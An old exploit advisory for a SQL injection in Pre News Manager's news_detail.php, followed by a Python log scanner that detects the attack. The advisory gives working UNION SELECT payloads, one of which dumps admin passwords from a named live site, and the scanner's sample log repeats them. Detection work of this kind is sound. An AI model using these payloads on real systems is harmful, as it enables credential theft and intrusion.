Pre News Manager suffers from a remote SQL injection vulnerability in news_detail.php.
ecd572294f3f8ce5456434cffd6fc1f0aa142a1fd9a5304f22b2a724183f8d3f
Pre News Manager [id] Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
----------------------------------------------------------------
script : Pre News Manager
script : http://www.preprojects.com/pclphp.asp
Risk : High
----------------------------------------------------------------
Discovered by : d3b4g
email : bl4ckend[at]gmail[dot]com
Site : www.bl4ck3nd.info
----------------------------------------------------------------
Exploit : http://www.target.com/[path]/news_detail.php?nid=-1+union+all+select+1,2,3,@@version,5,6,7/*
Live demo: http://www.preproject.com/news%20manager/news_detail.php?nid=-1+union+all+select+1,2,3,@@version,5,6,7/*
For password : http://www.preproject.com/news%20manager/news_detail.php?nid=-1+union+all+select+1,2,3,concat(password),5,6,7+from+admin/*
Rest find =P
----------------------------------------------------------------
Greetz: str0ke, Hotlism.org, All my friends
-----------------------------------------------------------------
Proud to be a Maldivian :))
=======================
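
A log check for the requests shown in this advisory, as an added example that is not part of the original advisory: it flags any news_detail.php request whose nid parameter is not a plain integer. The log lines are constructed, and it is an assumption here that legitimate nid values are positive integers of at most 10 digits.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate nid is a plain positive integer.
VALID_NID = re.compile(r"[0-9]{1,10}")
# Used only to label a finding; detection itself is the allow-list above.
SQL_HINT = re.compile(r"\b(union|select|concat|from)\b|@@|/\*|--", re.I)

# Constructed sample log (documentation IP range, made-up timestamps and sizes).
SAMPLE_LOG = '''\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news/news_detail.php?nid=42 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news/news_detail.php?nid=-1+union+all+select+1,2,3,@@version,5,6,7/* HTTP/1.1" 200 4987
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /news/news_detail.php?nid=-1+union+all+select+1,2,3,concat(password),5,6,7+from+admin/* HTTP/1.1" 200 5033
198.51.100.3 - - [01/Jan/2024:10:00:12 +0000] "GET /news/news_detail.php?nid=12abc HTTP/1.1" 200 100
'''


def check_line(line):
    """Return None for a benign line, else (reason, decoded nid value)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/news_detail.php"):
        return None
    # parse_qs decodes %XX and '+', so the value is what the script receives.
    for value in parse_qs(url.query, keep_blank_values=True).get("nid", []):
        if not VALID_NID.fullmatch(value):
            reason = "sql-keywords" if SQL_HINT.search(value) else "non-numeric"
            return (reason, value)
    return None


def scan(log_text):
    """Return (line number, reason, decoded nid) for every flagged line."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hit = check_line(line)
        if hit:
            findings.append((n, *hit))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer allow-list belongs in news_detail.php itself, before nid reaches the query, together with a parameterized statement.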